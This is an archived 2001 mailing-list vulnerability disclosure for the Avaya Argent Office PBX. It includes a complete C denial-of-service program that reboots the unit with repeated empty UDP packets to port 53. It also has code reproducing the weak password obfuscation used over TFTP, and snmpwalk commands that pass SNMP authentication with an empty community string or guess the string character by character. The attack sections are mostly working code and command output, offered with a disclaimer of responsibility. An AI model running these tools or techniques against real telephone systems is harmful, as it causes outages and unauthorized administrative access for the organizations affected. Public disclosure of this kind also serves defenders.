Multiple vulnerabilities in Avaya Argent Office

From: Jacek Lipkowski (sq5bpfat_private)
Date: Tue Aug 07 2001 - 05:35:52 PDT

Next message: ISS XForce: "ISS Security Advisory: Remote Vulnerabilities in Macromedia ColdF usion Example Applications"

Previous message: Clint Byrum: "Re: IIS keeps stopping, quite a large number of people affected by th is, why ?!?!"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Multiple vulnerabilities in Avaya Argent Office.

Systems affected: Avaya Argent Office
Impact: local dos attack

The Argent branch of products (now known as Network Alchemy line) from
Avaya are a solution integrating a PBX, network connectivity, dial on
demand networking etc. I had some security concerns when i looked at it.
Since all of them are only possible on a local network (and since this
system is designed for small offices), they shouldn't be much of a
problem.

1. Local denial of service

By sending an udp packet to port 53 with no payload the Argent Office
reboots. The unit gets up very quickly so one needs to send the
packets repeatedly. Sample source code below:

/* argent_kill.c 
(c) 2001 Jacek Lipkowski sq5bpfat_private
Reboots an Argent Office box by sending udp packets with no payload to port 53
usage: argent_kill ip_address
*/

#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>

main(int argc, char *argv[])
{
struct sockaddr_in addr;
struct hostent *host;
int s;

s=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if (s==-1) { perror("socket()"); exit(1); }
host=gethostbyname(argv[1]);
if (host==0) { herror("gethostbyname"); exit(1); }
memcpy(&addr.sin_addr,host->h_addr,host->h_length);
addr.sin_port=htons(53);
addr.sin_family=AF_INET;
if (connect(s,&addr,16)==-1) { perror("connect()"); exit(1); }
for (;;)
{
send(s,0,0,0); sleep(1); printf("."); fflush(stdout);
}
close(s);
}

2. Easily decryptable configuration password

Configuring Argent Office consists of a strange tftp look-alike. For
example to reboot a unit one must get via tftp the following file:

nasystem/rebootwhenfree/00e007002666/password//

Where 00e007002666 is the MAC address of the unit and password is the
obfuscated password. Since this packet is easily sniffed and the
obfuscation algorithm doesn't change, anyone with a sniffer can easily
obtain administrative privliges. The obfuscation mechanism is rather
simple, as the following example demonstrates:

/* argent_obfuscate.c 
(c) 2001 Jacek Lipkowski sq5bpfat_private
demonstrates how the password obfuscation 
mechanism works in argent office products */

main(int argc,char **argv)
{
int i;
unsigned char buf[32];
strcpy(&buf,argv[1]);
for (i=0;i<strlen(argv[1]);i++)
printf("0x%2.2X ",buf[i]+0x11-i);
printf("\n");
}

Show the hex values for the password 'idiocy':

~$ ./argent_obfuscate idiocy
0x7A 0x74 0x78 0x7D 0x70 0x85

Writing a decryption routine is left as an excercise to the reader :)

3. Dumb SNMP handling

This is a really good one! The software does snmp authentication via
something similar to: 
if (strncmp(n,c,strlen(n))==0) { ok, valid community}

Where c is the community string and n is the community string from the
network.

So basically if the size of the password in the packet is 0 then the
authentication is ok :)

~$ snmpwalk 192.168.1.234 "" system.sysDescr.0
system.sysDescr.0 = ARGENT OFFICE CPU 2.1 (138)

You could also guess the community string character by character.

guess the first letter:
~$ snmpwalk 192.168.1.234 a system.sysDescr.0
Timeout: No Response from 192.168.1.234
[the first letter is not a]
[several combinations later, is it p?]
~$ snmpwalk 192.168.1.234 p system.sysDescr.0
system.sysDescr.0 = ARGENT OFFICE CPU 2.1 (138)

[ok we have the first letter, lets go for the second]
~$ snmpwalk 192.168.1.234 pa system.sysDescr.0
Timeout: No Response from 192.168.1.234
[the second letter is not a]
[several combinations later, is it r?]
~$ snmpwalk 192.168.1.234 pr system.sysDescr.0
system.sysDescr.0 = ARGENT OFFICE CPU 2.1 (138)

etc... (the community is 'private')

While not much is gained by using snmp, the community may be some company
standard, and knowing it may open other doors.


4. Broadcast tftp requests

The system in it's default config requests a file called HoldMusic via
tftp
to the broadcast address. You could probably serve the file and change
your company's music on hold tune to something more interesting :).




All these vulnerabilities can be excercised only from internal interfaces
(i haven't found a way to kill it from the dialup interface), so the
impact is usually minor (the local staff could lauch a much more
destructive dos attack using a hammer), unless your network is public or
has other entry points.


The standard disclaimer applies, if you do any damage, it's your problem,
not mine (and neither is my employer).


-------------------------------------------------------
Andra Sp. z o.o.    Jacek Lipkowski sq5bpfat_private
ul. Wynalazek 6              Network Systems Specialist
02-677 Warsaw, Poland       tel. (+4822)6404873 wew 250
-------------------------------------------------------

Next message: ISS XForce: "ISS Security Advisory: Remote Vulnerabilities in Macromedia ColdF usion Example Applications"
Previous message: Clint Byrum: "Re: IIS keeps stopping, quite a large number of people affected by th is, why ?!?!"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Aug 07 2001 - 06:10:13 PDT